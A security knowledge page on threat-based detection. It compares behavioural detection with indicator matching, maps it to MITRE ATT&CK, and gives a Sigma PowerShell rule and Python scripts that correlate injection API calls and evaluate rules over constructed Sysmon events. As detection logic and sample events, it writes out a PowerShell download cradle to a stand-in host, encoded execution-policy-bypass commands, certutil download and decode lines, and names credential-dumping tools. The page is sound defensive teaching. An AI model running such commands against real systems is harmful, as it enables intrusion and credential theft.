# Threat-based Detection
One-liner: Detection focused on identifying attacker tactics, techniques, and procedures (TTPs) rather than specific indicators.
## What Is It?
Threat-based detection (also called TTP-based or behavioral detection) focuses on detecting how attackers operate, not just what tools they use. Instead of matching specific file hashes or IP addresses (Indicator Detection), threat-based detection identifies the behavioral patterns and techniques described in frameworks like MITRE ATT&CK.
## Threat-based vs Indicator-based Detection
| Aspect | Indicator Detection | Threat-based Detection |
|---|---|---|
| What it detects | Specific IOCs (IPs, hashes, domains) | Attacker behaviors (TTPs) |
| Example | Block IP 192.168.1.50 | Detect process injection |
| Evasion resistance | Low (change hash, change IP) | High (hard to change behavior) |
| Longevity | Days to weeks | Months to years |
| False positives | Lower | Higher (needs tuning) |
| Coverage | Known threats | Known + unknown threats |
### Pyramid of Pain

```text
                Hardest to change (Threat-based)
               ┌───────────┐
               │   TTPs    │  <- Most valuable
            ┌──┴───────────┴──┐
            │      Tools      │
         ┌──┴─────────────────┴──┐
         │   Network Artifacts   │
      ┌──┴───────────────────────┴──┐
      │       Host Artifacts        │
   ┌──┴─────────────────────────────┴──┐
   │           Domain Names            │
┌──┴───────────────────────────────────┴──┐
│              IP Addresses               │  <- Easiest to change
└─────────────────────────────────────────┘
                Easiest to change (Indicator-based)
```
Attackers easily change IPs and hashes, but changing their TTPs requires retooling and retraining.
## MITRE ATT&CK Mapping
Threat-based detection is organized around MITRE ATT&CK tactics and techniques.
### Example Detections

#### T1059.001 - PowerShell Execution

Behavioral Indicators:
- PowerShell spawned by an unexpected parent process (e.g., `winword.exe`)
- Encoded or obfuscated commands (`-enc`, `-e`)
- Remote download cradles (`IEX (New-Object Net.WebClient).DownloadString`)
- Execution policy bypass (`-ExecutionPolicy Bypass`)
Detection Rule (Sigma; the `logsource`, `tags` and `level` keys are required for a complete rule):

```yaml
title: Suspicious PowerShell Execution
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\powershell.exe'
    ParentImage|endswith:
      - '\winword.exe'
      - '\excel.exe'
      - '\outlook.exe'
    CommandLine|contains:
      - '-enc'
      - '-executionpolicy bypass'
      - 'downloadstring'
  condition: selection
level: high
```
#### T1055 - Process Injection

Behavioral Indicators:
- Process holding `PROCESS_VM_WRITE` permission on another process
- API calls: `VirtualAllocEx`, `WriteProcessMemory`, `CreateRemoteThread`
- Unsigned process injecting into a signed process
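The injection indicators above cannot be seen in a single event; they need correlation across several EDR API-call records. The following is an added example, not code from the original page: it groups constructed API-call records per (source, target) process pair, checks that VirtualAllocEx, WriteProcessMemory and CreateRemoteThread occur in that order, and raises severity when an unsigned source writes into a signed target. The record schema and sample paths are assumptions, not a real EDR format.

```python
"""Added example (not from the original page): stateful correlation of
EDR API-call telemetry for MITRE ATT&CK T1055 (Process Injection).

Single events cannot show either page indicator (the call sequence, or
unsigned-into-signed); this groups calls per (source, target) process pair
and checks order. The event schema below is an assumption.
"""
from collections import defaultdict

# The remote-injection sequence, in the order the calls must occur.
INJECTION_SEQUENCE = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")


def contains_in_order(calls, pattern):
    """True if every step of `pattern` appears in `calls` in that relative
    order (other calls may be interleaved between the steps)."""
    remaining = iter(calls)
    return all(any(call == step for call in remaining) for step in pattern)


def correlate_injection(events):
    """Return one alert per (source_pid, target_pid) pair whose cross-process
    API calls, ordered by timestamp, contain the full injection sequence."""
    by_pair = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        # A process allocating or writing in itself is routine; only
        # cross-process calls are injection candidates.
        if ev["api"] in INJECTION_SEQUENCE and ev["source_pid"] != ev["target_pid"]:
            by_pair[(ev["source_pid"], ev["target_pid"])].append(ev)

    alerts = []
    for (src, dst), calls in by_pair.items():
        if not contains_in_order([c["api"] for c in calls], INJECTION_SEQUENCE):
            continue
        first = calls[0]
        # Unsigned code injecting into a signed process is the higher-confidence
        # variant the page describes; signed-to-signed may be a debugger or AV.
        severity = "high" if (not first["source_signed"] and first["target_signed"]) else "medium"
        alerts.append({
            "technique": "T1055",
            "source": (src, first["source_image"]),
            "target": (dst, first["target_image"]),
            "severity": severity,
        })
    return alerts


def _ev(ts, api, src, dst, src_image, src_signed, dst_image, dst_signed):
    """Build one constructed telemetry record (assumed schema)."""
    return {"ts": ts, "api": api, "source_pid": src, "target_pid": dst,
            "source_image": src_image, "source_signed": src_signed,
            "target_image": dst_image, "target_signed": dst_signed}


# Constructed sample telemetry (not captured from a real host).
SAMPLE_EVENTS = [
    # Unsigned binary runs the full sequence against signed notepad.exe: high.
    _ev(1, "VirtualAllocEx",     4242, 1337, r"C:\Users\Public\update.exe", False, r"C:\Windows\notepad.exe", True),
    _ev(2, "WriteProcessMemory", 4242, 1337, r"C:\Users\Public\update.exe", False, r"C:\Windows\notepad.exe", True),
    _ev(3, "CreateRemoteThread", 4242, 1337, r"C:\Users\Public\update.exe", False, r"C:\Windows\notepad.exe", True),
    # Signed debugger writes into its debuggee but never creates a thread: no alert.
    _ev(4, "VirtualAllocEx",     900, 901, r"C:\Tools\debugger.exe", True, r"C:\Dev\app.exe", True),
    _ev(5, "WriteProcessMemory", 900, 901, r"C:\Tools\debugger.exe", True, r"C:\Dev\app.exe", True),
    # Same-process allocation is ignored entirely.
    _ev(6, "VirtualAllocEx", 55, 55, r"C:\Windows\explorer.exe", True, r"C:\Windows\explorer.exe", True),
    # Signed-to-signed full sequence with the payload written in two chunks: medium.
    _ev(7,  "VirtualAllocEx",     800, 801, r"C:\Program Files\AV\scanner.exe", True, r"C:\Dev\app.exe", True),
    _ev(8,  "WriteProcessMemory", 800, 801, r"C:\Program Files\AV\scanner.exe", True, r"C:\Dev\app.exe", True),
    _ev(9,  "WriteProcessMemory", 800, 801, r"C:\Program Files\AV\scanner.exe", True, r"C:\Dev\app.exe", True),
    _ev(10, "CreateRemoteThread", 800, 801, r"C:\Program Files\AV\scanner.exe", True, r"C:\Dev\app.exe", True),
]


def detect_sample():
    """Run the correlation over the constructed events."""
    return correlate_injection(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in detect_sample():
        print(alert)
```

The signed-to-signed hit is kept at medium rather than dropped because the page lists the API sequence itself as an indicator; the signing check only ranks it. In production the pair key would also carry the process start time, since PIDs are reused.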
#### T1003 - Credential Dumping

Behavioral Indicators:
- Access to `lsass.exe` memory
- `procdump.exe`, `mimikatz`, or similar tools
- NTLM hash extraction attempts
## Building Threat-based Detections

### Workflow

1. Study adversary TTPs
2. Map to a MITRE ATT&CK technique
3. Identify behavioral telemetry sources
4. Write a Sigma rule or SIEM query
5. Test with Atomic Red Team
6. Tune to reduce false positives
7. Deploy to production
### Telemetry Sources

- Sysmon: process creation, network connections, registry changes
- Windows Event Logs: Audit Logon Events, process tracking
- EDR: API calls, memory access, injection detection
- Zeek: network behaviors (C2 beaconing, tunneling)
- Elasticsearch / SIEM: correlation across data sources
## Detection Coverage Matrix
Track which MITRE ATT&CK techniques you can detect:
| Tactic | Technique | Detection Level | Telemetry |
|---|---|---|---|
| Execution | T1059.001 (PowerShell) | High | Process monitoring |
| Defense Evasion | T1070 (Indicator Removal) | Medium | File deletion logs |
| Credential Access | T1003 (Credential Dump) | High | lsass access |
| Lateral Movement | T1021 (RDP) | High | Audit Logon Events |
| Command & Control | T1071 (Web Protocols) | Medium | Zeek, proxy logs |
## Living Off the Land Detection

Living off the Land attacks use legitimate binaries, making IOC detection useless. Threat-based detection is critical:

### Example: Detecting Malicious Use of certutil.exe
Normal Use: Certificate management
Malicious Use: Download payloads
Detection:
- `certutil.exe` + URL in command line
- `certutil.exe` spawned by a suspicious parent
- `certutil.exe` + `-decode` (decoding malware)
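Both the T1059.001 Sigma rule earlier on this page and the certutil.exe indicators just listed are single-event matches over Sysmon process-creation fields. As an added example (not the page's code and not the Sigma project's code), the script below implements the Sigma constructs those rules rely on (named selections, the `|endswith`, `|contains` and `|re` field modifiers, AND-ed fields within a selection, OR-ed value lists) and runs both rules over constructed events, including a legitimate certificate-store operation that must not fire. The certutil rule and its suspicious-parent list are written here from the page's three indicators and are assumptions; `|re` is a real Sigma modifier but is not used on the page.

```python
"""Added example, not code from the original page: a small evaluator for the
Sigma constructs the page's rules use, run over constructed Sysmon Event ID 1
(process creation) records with the fields Image, ParentImage, CommandLine.
"""
import re

# Sigma string matching is case-insensitive for plain values and for the
# endswith/contains modifiers; a `re` pattern is evaluated as written.
MODIFIERS = {
    "equals":   lambda value, pat: value.lower() == pat.lower(),
    "endswith": lambda value, pat: value.lower().endswith(pat.lower()),
    "contains": lambda value, pat: pat.lower() in value.lower(),
    "re":       lambda value, pat: re.search(pat, value) is not None,
}


def field_matches(event, key, patterns):
    """One Sigma field line, `Field|modifier: value-or-list`; a list is OR-ed."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, ""))
    test = MODIFIERS[modifier or "equals"]
    pats = patterns if isinstance(patterns, list) else [patterns]
    return any(test(value, p) for p in pats)


def selection_matches(selection, event):
    """Fields inside one selection are AND-ed."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def rule_fires(rule, event):
    """Evaluate every named selection, then the rule's condition over them."""
    results = {name: selection_matches(sel, event) for name, sel in rule["selections"].items()}
    return rule["condition"](results)


# The page's T1059.001 rule; its Sigma condition is `selection`.
POWERSHELL_RULE = {
    "title": "Suspicious PowerShell Execution",
    "selections": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "ParentImage|endswith": ["\\winword.exe", "\\excel.exe", "\\outlook.exe"],
            "CommandLine|contains": ["-enc", "-executionpolicy bypass", "downloadstring"],
        },
    },
    "condition": lambda s: s["selection"],
}

# certutil rule written from the page's indicators: URL in the command line,
# -decode, or a suspicious parent. Sigma condition: `selection and 1 of selection_*`.
CERTUTIL_RULE = {
    "title": "Suspicious certutil.exe Use",
    "selections": {
        "selection": {"Image|endswith": "\\certutil.exe"},
        "selection_url": {"CommandLine|re": r"https?://"},
        "selection_decode": {"CommandLine|contains": "-decode"},
        # Assumed parent list; tune to the environment.
        "selection_parent": {"ParentImage|endswith": ["\\winword.exe", "\\powershell.exe", "\\wscript.exe"]},
    },
    "condition": lambda s: s["selection"] and any(v for k, v in s.items() if k.startswith("selection_")),
}

RULES = [POWERSHELL_RULE, CERTUTIL_RULE]


def _proc(image, parent, cmdline):
    """Build one constructed Sysmon Event ID 1 record."""
    return {"EventID": 1, "Image": image, "ParentImage": parent, "CommandLine": cmdline}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CU = r"C:\Windows\System32\certutil.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    _proc(PS, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc <base64-placeholder>"),
    _proc(PS, r"C:\Windows\explorer.exe", r"powershell.exe -File C:\scripts\backup.ps1"),  # benign parent
    _proc(PS, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
          "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""),
    _proc(CU, r"C:\Windows\System32\cmd.exe", "certutil.exe -urlcache -split -f http://example.invalid/a.dat a.dat"),
    _proc(CU, r"C:\Windows\System32\mmc.exe", "certutil.exe -addstore Root corp-root.cer"),  # legitimate admin use
    _proc(CU, PS, "certutil.exe -decode payload.txt payload.exe"),
]


def run_sample():
    """Return (rule title, event index) for every rule that fires on the samples."""
    return [(rule["title"], i) for i, ev in enumerate(SAMPLE_EVENTS) for rule in RULES if rule_fires(rule, ev)]


if __name__ == "__main__":
    for title, i in run_sample():
        print(f"{title}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

The case-insensitive `contains` is what lets `-executionpolicy bypass` in the rule match `-ExecutionPolicy Bypass` on the command line. The same looseness means `-enc` also matches parameters such as `-Encoding`; that is the kind of false positive that step 6 of the workflow tunes out, and requiring the Office parent as the page's rule does is one way to keep the match tight.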
## Detection Maturity

Threat-based detection represents a mature detection program:

1. Level 1 (Reactive): signature/IOC-based only
2. Level 2 (Proactive): some behavioral rules
3. Level 3 (Advanced): extensive TTP coverage
4. Level 4 (Leading): automated threat hunting
## Testing Detections

Validate threat-based detections with:
- Atomic Red Team: MITRE ATT&CK technique tests
- Purple Teaming: collaborative red/blue exercises
- Tabletop Exercise: scenario walkthroughs

Example Test:

```powershell
# Atomic Test: T1059.001 - PowerShell Download Cradle
Invoke-AtomicTest T1059.001 -TestNumbers 1
```

Verify your detection fires, tune, repeat.
## Interview Angles
Q: Why is threat-based detection better than signature-based?
- Signatures detect known threats with specific IOCs
- Threat-based detects behaviors, catching variants and zero-days
- Attackers easily change hashes/IPs; changing TTPs requires retooling
- Maps to MITRE ATT&CK for comprehensive coverage
Q: How would you detect Living off the Land attacks?
STAR Example:
Situation: Attacker used `certutil.exe` to download malware (no malicious file hash to block).
Task: Detect this TTP going forward.
Action:
- Mapped to MITRE ATT&CK T1105 (Ingress Tool Transfer)
- Created Sysmon rule detecting `certutil.exe` + `-urlcache` + external URL
- Tested with Atomic Red Team
Result: Detected 3 subsequent attempts using `certutil`, `bitsadmin`, and `mshta`.
Q: What's the downside of behavioral detection?
- Higher False Positive rate initially (requires tuning)
- Needs deep understanding of attacker TTPs
- Requires quality telemetry (Sysmon, EDR)
- More complex to build and maintain than simple IOC matching
## Related Concepts

- Detection Engineering: building detections
- Indicator Detection: complementary approach
- Environment-based detection: third detection type
- [[MITRE ATT&CK]]: framework for TTPs
- [[Sigma]]: universal rule format
- [[Atomic Red Team]]: testing framework